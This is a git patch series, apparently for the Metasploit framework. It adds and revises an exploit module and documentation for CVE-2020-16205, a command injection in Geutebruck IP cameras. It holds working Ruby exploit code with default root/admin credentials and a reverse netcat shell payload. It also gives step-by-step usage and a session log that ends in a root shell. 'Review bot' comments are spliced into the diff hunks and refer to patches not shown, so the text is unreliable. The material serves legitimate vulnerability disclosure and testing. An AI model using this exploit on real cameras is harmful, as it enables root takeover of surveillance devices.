From a5e25f5a42b3c787ad94655d74c9e5af621a771b Mon Sep 17 00:00:00 2001 From: ddouhine Date: Tue, 11 Aug 2020 18:17:32 +0200 Subject: [PATCH 01/20] Add exploit for Geutebruck G-CAM --- .../linux/http/geutebruck_testaction_exec.rb | 84 +++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 modules/exploits/linux/http/geutebruck_testaction_exec.rb diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb new file mode 100644 index 0000000000..8be68ca00b --- /dev/null +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb 
@@ -0,0 +1,84 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Geutebruck testaction.cgi Remote Command Execution', + 'Description' => %q{ + This module exploits a an arbitrary command execution vulnerability. The + vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an + authenticated user to execute arbitrary commands with root privileges. + with web user privileges. Firmware <= 1.12.14.5 are concerned. + Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware. + }, + 'Author' => + [ + 'Davy Douhine' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2020-16205' ], + [ 'URL', 'http://geutebruck.com' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ] + ], + 'DisclosureDate' => 'May 20 2020', + 'Privileged' => true, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_ARMLE], + 'Targets' => [ + [ 'Automatic Target', { } ] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => + { + 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' + } + )) + + register_options( + [ + OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]), + OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]), + OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']), + ], self.class) + end + + def check + begin + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/brand.xml', + 'query' => "", + ) + if res && (res.body.include?("1.12.0.25") || res.body.include?("1.12.13.2") || res.body.include?("1.12.14.5")) + return CheckCode::Vulnerable + end + rescue ::Rex::ConnectionError + return CheckCode::Unknown + end + 
CheckCode::Safe + end + + def exploit + user = datastore['HttpUsername'] + pass = datastore['HttpPassword'] + header = "type=ntp&server=%0a" + uri = target_uri.path + "?" + "#{header}" + Rex::Text.uri_encode(payload.encoded, "hex-all") + print_status("#{rhost}:#{rport} - Attempting to exploit...") + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri + }) + end + +end From a14a2fe8d21c16de9dd78e931beee669419b936c Mon Sep 17 00:00:00 2001 From: ddouhine Date: Tue, 11 Aug 2020 19:43:50 +0200 Subject: [PATCH 02/20] Add documentation for Geutebruck G-CAM exploit --- .../linux/http/geutebruck_testaction_exec.md | 68 +++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md new file mode 100644 index 0000000000..242bbc9f79 --- /dev/null +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md 
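Review bot: `include Msf::Exploit::CmdStager` is pulled in but nothing in the module uses it — `exploit` sends `payload.encoded` straight into the request and `execute_cmdstager` is never called — so the mixin and the options it registers are dead weight, and the same unused include survives the rewrite in PATCH 08 and the `prepend` added in PATCH 17. Relatedly, `'Arch' => [ARCH_ARMLE]` is declared while the default payload `cmd/unix/reverse_netcat_gaping` is a command payload; if the framework's payload-compatibility check goes by the module's Arch list, `ARCH_CMD` has to be listed too, which is worth confirming with a `show payloads` run. Dropping the include and writing `'Arch' => ARCH_CMD` would make the declared interface match what the module actually does.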
@@ -0,0 +1,68 @@ +## Vulnerable Application + +[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models: +G-Code: + EEC-2xxx +G-Cam: + EBC-21xx + EFD-22xx + ETHC-22xx + EWPC-22xx + +### Description + +This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products. +Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 +Tested it with the 1.12.14.5 firmware only. + +## Verification Steps + +List the steps needed to make sure this thing works + + 1. Do: `use exploit/linux/http/geutebruck_testaction_exec` + 2. Do: `set httpusername root` + 3. Do: `set httppassword admin` + 4. Do: `set lhost 192.168.14.1` + 5. Do: `set rhosts 192.168.14.58` + 6. Do: `set payload cmd/unix/reverse_netcat_gaping` + 7. Do: `check` + 8. Do: `exploit` + +## Options + + ### HTTPUSERNAME + + A username used to authenticate on the admin page. **Default: root** + + ### HTTPPASSWORD + +The password of the username used to authenticate on the admin page. **Default: admin** + +## Scenarios + +``` +msf5 > use exploit/linux/http/geutebruck_testaction_exec +msf5 exploit(linux/http/geutebruck_testaction_exec) > +msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping +payload => cmd/unix/reverse_netcat_gaping +msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root +httpusername => root +msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin +httppassword => admin +msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1 +lhost => 192.168.14.1 +msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58 +rhosts => 192.168.14.58 +msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit + +[*] Started reverse TCP handler on 192.168.14.1:4444 +[*] 192.168.14.58:80 - Attempting to exploit... 
+[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200 +pwd + +/tmp/www_ramdisk/uapi-cgi/admin +id +uid=0(root) gid=0(root) +uname -a +Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux +``` From e4f760691ed5f04a5394bcf2dc7f7e44f8d61bef Mon Sep 17 00:00:00 2001 From: ddouhine Date: Thu, 13 Aug 2020 16:02:18 +0200 Subject: [PATCH 03/20] Update geutebruck_testaction_exec.md it should be better now :) --- .../linux/http/geutebruck_testaction_exec.md | 40 +++++++++++++------ 1 file changed, 28 insertions(+), 12 deletions(-) diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md index 242bbc9f79..936310d279 100644 --- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md @@ -1,6 +1,7 @@ ## Vulnerable Application -[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models: +The web interface of the following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned: +Encoder and E2 Series Camera models: G-Code: EEC-2xxx G-Cam: 
@@ -9,33 +10,48 @@ G-Cam: ETHC-22xx EWPC-22xx +Many brands use the same firmware: +UDP Technology (which is also the supplier of the firmware for the other vendors) +Ganz +Visualint +Cap +THRIVE Intelligence +Sophus +VCA +TripCorps +Sprinx Technologies +Smartec +Riva + +This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware. + ### Description This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products. Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 -Tested it with the 1.12.14.5 firmware only. ## Verification Steps -List the steps needed to make sure this thing works - - 1. Do: `use exploit/linux/http/geutebruck_testaction_exec` - 2. Do: `set httpusername root` - 3. Do: `set httppassword admin` - 4. Do: `set lhost 192.168.14.1` - 5. Do: `set rhosts 192.168.14.58` + 1. Start the camera using default configuration + 2. Launch msfconsole + 3. Do: `use exploit/linux/http/geutebruck_testaction_exec` + 4. Do: `set httpusername root` + 5. Do: `set httppassword admin` + 6. Do: `set lhost ` + 5. Do: `set rhosts ` 6. Do: `set payload cmd/unix/reverse_netcat_gaping` - 7. Do: `check` + 7. Do: `check` to be sure the target is vulnerable 8. Do: `exploit` + 9. You should get a shell ## Options - ### HTTPUSERNAME +The default credentials to log on the web interface are root/admin. + ### HTTPUSERNAME A username used to authenticate on the admin page. **Default: root** ### HTTPPASSWORD - The password of the username used to authenticate on the admin page. **Default: admin** ## Scenarios From 42a2a77a7ea45f7dd00ef36a0eae732d3d6ce64a Mon Sep 17 00:00:00 2001 
From: ddouhine Date: Thu, 13 Aug 2020 16:13:46 +0200 Subject: [PATCH 04/20] Update geutebruck_testaction_exec.md or now... (forgot the msftidy_docs just before) --- .../exploit/linux/http/geutebruck_testaction_exec.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md index 936310d279..a4960686f0 100644 --- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md @@ -1,10 +1,10 @@ ## Vulnerable Application -The web interface of the following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned: +The following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5: Encoder and E2 Series Camera models: -G-Code: +G-Code: EEC-2xxx -G-Cam: +G-Cam: EBC-21xx EFD-22xx ETHC-22xx @@ -27,7 +27,7 @@ This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12. ### Description -This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products. +This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface. Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 ## Verification Steps From 4ceb542fac3f094cd9658a70272a93f71109c771 Mon Sep 17 00:00:00 2001 From: ddouhine Date: Thu, 13 Aug 2020 16:18:10 +0200 Subject: [PATCH 05/20] Update modules/exploits/linux/http/geutebruck_testaction_exec.rb Co-authored-by: bcoles --- .../exploits/linux/http/geutebruck_testaction_exec.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) 
diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index 8be68ca00b..3faec27959 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -71,13 +71,12 @@ class MetasploitModule < Msf::Exploit::Remote def exploit user = datastore['HttpUsername'] pass = datastore['HttpPassword'] - header = "type=ntp&server=%0a" - uri = target_uri.path + "?" + "#{header}" + Rex::Text.uri_encode(payload.encoded, "hex-all") print_status("#{rhost}:#{rport} - Attempting to exploit...") - res = send_request_raw( + res = send_request_cgi( { - 'method' => 'GET', - 'uri' => uri + 'method' => 'GET', + 'uri' => target_uri.path, + 'vars_get' => { 'type' => 'ntp', 'server' => "\n#{payload.encoded}" } }) end From a69d941a72a24609bfefdb89d3498940c6c24610 Mon Sep 17 00:00:00 2001 From: ddouhine Date: Thu, 13 Aug 2020 16:18:28 +0200 Subject: [PATCH 06/20] Update modules/exploits/linux/http/geutebruck_testaction_exec.rb Co-authored-by: bcoles --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index 3faec27959..c52dd9bcfc 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]), OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]), OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']), - ], self.class) + ]) end def check From 5f6a0746a6f0dbdc49f785a74fd577180413a78a Mon Sep 17 00:00:00 2001 
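Review bot: `user` and `pass` are still assigned from the datastore but are no longer read anywhere in `exploit` after the `uri` construction was removed, and `res` is assigned but never used, so all three are dead locals after this change. The two credential lines can go (the HttpClient mixin picks up `HttpUsername`/`HttpPassword` itself — confirm against the mixin), and the request should simply be `send_request_cgi(` without the assignment. The `exploit` method is entirely inside the hunk but the class continues outside it.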
From: ddouhine Date: Thu, 13 Aug 2020 16:19:19 +0200 Subject: [PATCH 07/20] Update modules/exploits/linux/http/geutebruck_testaction_exec.rb Co-authored-by: bcoles --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index c52dd9bcfc..556b08a5f2 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Geutebruck testaction.cgi Remote Command Execution', 'Description' => %q{ - This module exploits a an arbitrary command execution vulnerability. The + This module exploits an arbitrary command execution vulnerability. The vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an authenticated user to execute arbitrary commands with root privileges. with web user privileges. Firmware <= 1.12.14.5 are concerned. From 959689d5dea6e27a51e0491645ebfbf5ffba2340 Mon Sep 17 00:00:00 2001 From: ddouhine Date: Thu, 13 Aug 2020 16:24:45 +0200 Subject: [PATCH 08/20] Update geutebruck_testaction_exec.rb Fixed rubocop offenses / msftidy warnings and added @bcoles enhancements. --- .../linux/http/geutebruck_testaction_exec.rb | 112 +++++++++--------- 1 file changed, 57 insertions(+), 55 deletions(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index 556b08a5f2..a1642f9efa 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb 
@@ -1,83 +1,85 @@ ## -# This module requires Metasploit: http://metasploit.com/download +# This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## - class MetasploitModule < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GoodRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager - + def initialize(info = {}) - super(update_info(info, - 'Name' => 'Geutebruck testaction.cgi Remote Command Execution', - 'Description' => %q{ - This module exploits an arbitrary command execution vulnerability. The - vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an - authenticated user to execute arbitrary commands with root privileges. - with web user privileges. Firmware <= 1.12.14.5 are concerned. - Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware. - }, - 'Author' => - [ - 'Davy Douhine' + super( + update_info( + info, + 'Name' => 'Geutebruck testaction.cgi Remote Command Execution', + 'Description' => %q{ + This module exploits an arbitrary command execution vulnerability. The + vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an + authenticated user to execute arbitrary commands with root privileges. + Firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned. + Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware. 
+ }, + 'Author' => + [ + 'Davy Douhine' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2020-16205' ], + [ 'URL', 'http://geutebruck.com' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ], + [ 'URL', 'https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/' ] + ], + 'DisclosureDate' => 'May 20 2020', + 'Privileged' => true, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_ARMLE], + 'Targets' => [ + [ 'Automatic Target', {} ] ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2020-16205' ], - [ 'URL', 'http://geutebruck.com' ], - [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ] - ], - 'DisclosureDate' => 'May 20 2020', - 'Privileged' => true, - 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_ARMLE], - 'Targets' => [ - [ 'Automatic Target', { } ] - ], - 'DefaultTarget' => 0, - 'DefaultOptions' => - { - 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' - } - )) + 'DefaultTarget' => 0, + 'DefaultOptions' => + { + 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' + } + ) + ) register_options( [ OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]), OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]), OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']), - ]) + ] + ) end def check - begin - res = send_request_cgi( - 'method' => 'GET', - 'uri' => '/brand.xml', - 'query' => "", - ) - if res && (res.body.include?("1.12.0.25") || res.body.include?("1.12.13.2") || res.body.include?("1.12.14.5")) - return CheckCode::Vulnerable - end - rescue ::Rex::ConnectionError - return CheckCode::Unknown + begin + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/brand.xml' + ) + if res && (res.body.include?('1.12.0.25') || res.body.include?('1.12.13.2') || res.body.include?('1.12.14.5')) + return CheckCode::Vulnerable end - CheckCode::Safe + rescue ::Rex::ConnectionError + return 
CheckCode::Unknown end + CheckCode::Safe + end def exploit - user = datastore['HttpUsername'] - pass = datastore['HttpPassword'] print_status("#{rhost}:#{rport} - Attempting to exploit...") - res = send_request_cgi( + send_request_cgi( { - 'method' => 'GET', - 'uri' => target_uri.path, + 'method' => 'GET', + 'uri' => target_uri.path, 'vars_get' => { 'type' => 'ntp', 'server' => "\n#{payload.encoded}" } - }) + } + ) end end From 3c70f37dbe8321fa5805005f2428a2a7ace1da7b Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Thu, 13 Aug 2020 14:40:33 -0500 Subject: [PATCH 09/20] Update exploit ranking to reflect the fact that this is a CMD Injection vulnerability with no chance of crashing the host --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index a1642f9efa..e53923e0d5 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -4,7 +4,7 @@ ## class MetasploitModule < Msf::Exploit::Remote - Rank = GoodRanking + Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager From dc21773f1083bed696a6dbf191ddb8352ee67b0a Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Thu, 13 Aug 2020 15:13:55 -0500 Subject: [PATCH 10/20] Apply updates to make the English a bit neater r.e affected versions. Also applied updates to make the markdown have bullet points so it displays better. Finally modified up the module description to explain the actual issue a bit more, but it might still need work --- .../linux/http/geutebruck_testaction_exec.md | 54 ++++++++++--------- 1 file changed, 30 insertions(+), 24 deletions(-) 
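Review bot: `exploit` now discards the result of `send_request_cgi`, so an authentication failure on the admin CGI (`root`/`admin` are only defaults) is never reported to the operator and the module ends as if the command had been sent. When the request does return, a `res && res.code == 401` should end with `fail_with(Failure::NoAccess, 'Authentication failed')`; a nil result is inconclusive here, since with a reverse-shell payload the CGI may not answer before the socket times out, so it should be surfaced with `print_warning` rather than treated as fatal. In `check`, the three `res.body.include?` substring matches will also accept any body that merely contains those digits, which the `Gem::Version` parsing added in PATCH 14 later tightens.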
diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md index a4960686f0..59b189e30a 100644 --- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md 
@@ -1,34 +1,41 @@ ## Vulnerable Application -The following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5: -Encoder and E2 Series Camera models: -G-Code: - EEC-2xxx -G-Cam: - EBC-21xx - EFD-22xx - ETHC-22xx - EWPC-22xx +The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.25, +firmware version 1.12.13.2 or firmware version 1.12.14.5: +* Encoder and E2 Series Camera models: + * G-Code: + * EEC-2xxx + * G-Cam: + * EBC-21xx + * EFD-22xx + * ETHC-22xx + * EWPC-22xx Many brands use the same firmware: -UDP Technology (which is also the supplier of the firmware for the other vendors) -Ganz -Visualint -Cap -THRIVE Intelligence -Sophus -VCA -TripCorps -Sprinx Technologies -Smartec -Riva + * UDP Technology (which is also the supplier of the firmware for the other vendors) + * Ganz + * Visualint + * Cap + * THRIVE Intelligence + * Sophus + * VCA + * TripCorps + * Sprinx Technologies + * Smartec + * Riva -This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware. +This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5. ### Description -This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface. -Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 +This module exploits an authenticated OS command injection vulnerability (CVE-2020-16205) within the +`server` GET parameter of /uapi-cgi/admin/testaction.cgi when the `type` parameter is set to `ntp`. +This issue occurs due to a lack of validation on the `server` parameter, which allows an attacker to +inject a new line character, followed by the command they wish to execute, at which point the server will +then interpret the new string as a separate command to be executed. 
Successful exploitation will result in +remote code execution as the `root` user. + +Users can find additional details of this vulnerability on the advisory page at https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03. ## Verification Steps @@ -58,7 +65,6 @@ The password of the username used to authenticate on the admin page. **Default: ``` msf5 > use exploit/linux/http/geutebruck_testaction_exec -msf5 exploit(linux/http/geutebruck_testaction_exec) > msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping payload => cmd/unix/reverse_netcat_gaping msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root From c59b3835f9860bee0cbe4dbefa601106f31594c2 Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Thu, 13 Aug 2020 15:18:10 -0500 Subject: [PATCH 11/20] Fix up module description to have better sentence structure and English and to also include the actual versions of the products that were affected in addition to the firmware versions. This prevents people from having to read the documentation to find affected targets --- .../linux/http/geutebruck_testaction_exec.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index e53923e0d5..6037275fa4 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb 
@@ -14,15 +14,15 @@ class MetasploitModule < Msf::Exploit::Remote info, 'Name' => 'Geutebruck testaction.cgi Remote Command Execution', 'Description' => %q{ - This module exploits an arbitrary command execution vulnerability. The - vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an - authenticated user to execute arbitrary commands with root privileges. - Firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned. - Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware. + This module exploits an authenticated arbitrary command execution vulnerability within the + /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, + ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware + versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as + the root user. }, 'Author' => [ - 'Davy Douhine' + 'Davy Douhine' # ddouhine ], 'License' => MSF_LICENSE, 'References' => From 0dc53c46d4d3b2dcae9946f0851cbbe165d208fa Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Thu, 13 Aug 2020 15:23:09 -0500 Subject: [PATCH 12/20] Apply Rubocop fixes I forgot about and update the module description to add in missing information about affected parameters --- .../exploits/linux/http/geutebruck_testaction_exec.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index 6037275fa4..a39c7e207f 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb 
@@ -14,11 +14,11 @@ class MetasploitModule < Msf::Exploit::Remote info, 'Name' => 'Geutebruck testaction.cgi Remote Command Execution', 'Description' => %q{ - This module exploits an authenticated arbitrary command execution vulnerability within the - /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, - ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware - versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as - the root user. + This module exploits an authenticated arbitrary command execution vulnerability within the 'server' + GET parameter of the /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, + ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware + versions 1.12.13.2 and 1.12.14.5 when the 'type' GET paramter is set to 'ntp'. + Successful exploitation results in remote code execution as the root user. }, 'Author' => [ From 5e7c821d6db71b368d01a24dc74bc6369b4a0fd2 Mon Sep 17 00:00:00 2001 From: ddouhine Date: Fri, 14 Aug 2020 23:15:12 +0200 Subject: [PATCH 13/20] Update geutebruck_testaction_exec.md --- .../modules/exploit/linux/http/geutebruck_testaction_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md index 59b189e30a..ab009e1823 100644 --- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md 
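Review bot: The new description line reads `when the 'type' GET paramter is set to 'ntp'` — "paramter" should be "parameter"; this text is shown to operators by `info`, so the line should be `versions 1.12.13.2 and 1.12.14.5 when the 'type' GET parameter is set to 'ntp'.`. The enclosing `initialize` begins and ends outside the hunk.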
@@ -62,7 +62,7 @@ The default credentials to log on the web interface are root/admin. The password of the username used to authenticate on the admin page. **Default: admin** ## Scenarios - +### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5. ``` msf5 > use exploit/linux/http/geutebruck_testaction_exec msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping From f726967ba7dd7c824337025dae0b1b88dd62d99e Mon Sep 17 00:00:00 2001 From: ddouhine Date: Fri, 14 Aug 2020 23:17:26 +0200 Subject: [PATCH 14/20] Update geutebruck_testaction_exec.rb with the updated check using `Gem::Version` --- .../linux/http/geutebruck_testaction_exec.rb | 26 +++++++++++++++---- 1 file changed, 21 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index a39c7e207f..e5df31d39b 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -20,6 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote versions 1.12.13.2 and 1.12.14.5 when the 'type' GET paramter is set to 'ntp'. Successful exploitation results in remote code execution as the root user. }, + 'Author' => [ 'Davy Douhine' # ddouhine 
@@ -56,18 +57,33 @@ class MetasploitModule < Msf::Exploit::Remote ) end - def check + def firmware begin res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) - if res && (res.body.include?('1.12.0.25') || res.body.include?('1.12.13.2') || res.body.include?('1.12.14.5')) - return CheckCode::Vulnerable + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown end - rescue ::Rex::ConnectionError - return CheckCode::Unknown + + res_xml = res.get_xml_document + @version = res_xml.at('//firmware').text + return true end + end + + def check + firmware + version = Gem::Version.new(@version) + vprint_status "Found Geutebruck version #{version}" + if version < Gem::Version.new('1.12.0.25') || + version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5') + + return CheckCode::Appears + end + CheckCode::Safe end From f3fdcf43436cbd89086f7a0ee932412c41a9ad35 Mon Sep 17 00:00:00 2001 From: ddouhine Date: Fri, 14 Aug 2020 23:56:21 +0200 Subject: [PATCH 15/20] Update geutebruck_testaction_exec.rb Oops sorry, don't know what this "return true" was doing there. --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index e5df31d39b..c49211453a 100644 --- 